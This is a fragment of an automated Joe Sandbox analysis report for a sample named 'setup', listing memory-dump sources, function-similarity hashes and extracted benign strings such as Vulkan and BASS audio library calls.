                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: what(): $N2
                                                                                                    • API String ID: 0-1011025255
                                                                                                    • Opcode ID: 633b84686ef66dbc8edb159b5c32baf31abeadad87cfe877ca22712fe5889196
                                                                                                    • Instruction ID: 95d8675887d42a975d587bbfd32a84dcedf8d61b538f8acf7a25b316a4883129
                                                                                                    • Opcode Fuzzy Hash: 633b84686ef66dbc8edb159b5c32baf31abeadad87cfe877ca22712fe5889196
                                                                                                    • Instruction Fuzzy Hash: D1314DB45153119BC706BFB4D48622EBAE0AF84704F128C2CE1C99F343DBB888909F97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientWindow$LongScreen$Rect
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 911421538-4088798008
                                                                                                    • Opcode ID: 64ebf6d4184ca594d74869307c0680b4e052fcafff163bb897bf8f712b4bd2d2
                                                                                                    • Instruction ID: af780876e6c9c985afda935bbab330a767a2d7a4217f7fb5648d83b6ed090ffc
                                                                                                    • Opcode Fuzzy Hash: 64ebf6d4184ca594d74869307c0680b4e052fcafff163bb897bf8f712b4bd2d2
                                                                                                    • Instruction Fuzzy Hash: 0841C5759083018FD700EF28D68861ABBF4BF89311F058A2DEC989B355E774D958CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientWindow$LongScreen$Rect
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 911421538-4088798008
                                                                                                    • Opcode ID: 1c9b4540fbc2260dd8e295a88072e57926b4600c6be6bd2a1ba8b022c380d02c
                                                                                                    • Instruction ID: 44f68223cef4fc9a5682e97237d3e98b507093afd60ba1c656cc471563bd5294
                                                                                                    • Opcode Fuzzy Hash: 1c9b4540fbc2260dd8e295a88072e57926b4600c6be6bd2a1ba8b022c380d02c
                                                                                                    • Instruction Fuzzy Hash: 9F41E6755083018FDB00EF68D68861ABBF4BF89311F05892DEC989B355E774D958CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abortfputcfputsfreefwrite
                                                                                                    • String ID: what(): $N2
                                                                                                    • API String ID: 2053421089-1011025255
                                                                                                    • Opcode ID: dabdbef624ce0654cde8358326ca6e926fd718117da705743228a170d6858cd5
                                                                                                    • Instruction ID: e24ee57621da551e69aa57ea94b613d42b6d10968b3e71dead1e877f75688e00
                                                                                                    • Opcode Fuzzy Hash: dabdbef624ce0654cde8358326ca6e926fd718117da705743228a170d6858cd5
                                                                                                    • Instruction Fuzzy Hash: C1312BB45183219FD716BF74D48632EBAE4AF44304F028C5DE4C88F252EBB488909F93
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215731: EnterCriticalSection.KERNEL32(00357D30,0023BDFF,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00215736
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0023C4AD
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0023C4B5
                                                                                                    • GetLastError.KERNEL32 ref: 0023C4C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,BASSplugin), ref: 0023C4E6
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0023C565
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressCriticalEnterErrorFreeLastProcSection
                                                                                                    • String ID: +$BASSplugin
                                                                                                    • API String ID: 757004937-3870098477
                                                                                                    • Opcode ID: 9b39d88af1d9305065d2dfc1b548d71c3b64e472254749b9ccc20e9d98b4ad2f
                                                                                                    • Instruction ID: 57af3e875204c6fd8976baf3741076566bdb20a51b971b6382a199edd11d6645
                                                                                                    • Opcode Fuzzy Hash: 9b39d88af1d9305065d2dfc1b548d71c3b64e472254749b9ccc20e9d98b4ad2f
                                                                                                    • Instruction Fuzzy Hash: 8F2125B1521311DBC725EF64D94566EB7F8EB41712F304029E502F3221CBB4EC619F50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extension count: %s, xrefs: 00244D5B
                                                                                                    • vulkan-1.dll, xrefs: 00244CD0
                                                                                                    • vkGetInstanceProcAddr, xrefs: 00244CED
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 00244D0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProccallocfreestrcpy
                                                                                                    • String ID: Vulkan: Failed to query instance extension count: %s$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 1216305380-2158378352
                                                                                                    • Opcode ID: f9838768b1d0ced33d766381344d8f3f705f4018dbf97f4ea0c4b40588b3b096
                                                                                                    • Instruction ID: e8afff3199d22c75994bdbe8a28b707a46fba6b9fb5dd1f920c0740d395d7527
                                                                                                    • Opcode Fuzzy Hash: f9838768b1d0ced33d766381344d8f3f705f4018dbf97f4ea0c4b40588b3b096
                                                                                                    • Instruction Fuzzy Hash: 5A112AB59143018ED700BF78EA0931BBBE0EB45345F05483DEC88C7264E774D459CB96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr
                                                                                                    • String ID: $:$Invalid special open parenthesis.$Unexpected end of character class.$Unexpected end of regex when escaping.$Unexpected end of regex when in an open parenthesis.$p
                                                                                                    • API String ID: 2830005266-1388832302
                                                                                                    • Opcode ID: 84e32503f2c87581e7cb73e23c86f0a732aa34301a6b4327d7cea000ec4f96c1
                                                                                                    • Instruction ID: 0d765865af5fde48c07f198f17cef144307aaee88909f783af2823a3fab55645
                                                                                                    • Opcode Fuzzy Hash: 84e32503f2c87581e7cb73e23c86f0a732aa34301a6b4327d7cea000ec4f96c1
                                                                                                    • Instruction Fuzzy Hash: E8C192706093448FDB19CF28C0847E57BE1AF8A304F5984B9D9C88F347DB758889CB66
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                    • API String ID: 2450578220-802862622
                                                                                                    • Opcode ID: 9c40d710fb7f5d45cbd84917239faff81d59239d1ec87db104bbb3d7ecf8138c
                                                                                                    • Instruction ID: 66995c295238b0c44a6120bef0b3134219e93883084eb0e595c8393068d49251
                                                                                                    • Opcode Fuzzy Hash: 9c40d710fb7f5d45cbd84917239faff81d59239d1ec87db104bbb3d7ecf8138c
                                                                                                    • Instruction Fuzzy Hash: 54F0F2B49087428BDB00EF38DA4821ABBF0BF85306F84892CE88587204E774E51DDB87
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                    • API String ID: 2450578220-802862622
                                                                                                    • Opcode ID: 2b5bdac99d92d62e7f8d6a00a3483ea120ca3789d99b4cafd4ee4ebf2c8db601
                                                                                                    • Instruction ID: 2dbd5820aaa5c5ab2fa9b76a61643dcb38799af42b9d5d79501a87f9893559ee
                                                                                                    • Opcode Fuzzy Hash: 2b5bdac99d92d62e7f8d6a00a3483ea120ca3789d99b4cafd4ee4ebf2c8db601
                                                                                                    • Instruction Fuzzy Hash: 6EF01FB45083418BDB00EF38DA4822EBBE0BF84346F80893CE88187215E774E12D8B87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 98c989c7af11a403c5d0111f2e25aad101572a1ad2b5a642d14abb7de709c084
                                                                                                    • Instruction ID: 9023f4d4c60c94245847a41f193088e31bd97627b14d1ba533f5041ce75bea74
                                                                                                    • Opcode Fuzzy Hash: 98c989c7af11a403c5d0111f2e25aad101572a1ad2b5a642d14abb7de709c084
                                                                                                    • Instruction Fuzzy Hash: 5071B271A293068FD710DF28C4C176FB7D2AFC4704F18892AE99597206D370DD99EB92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
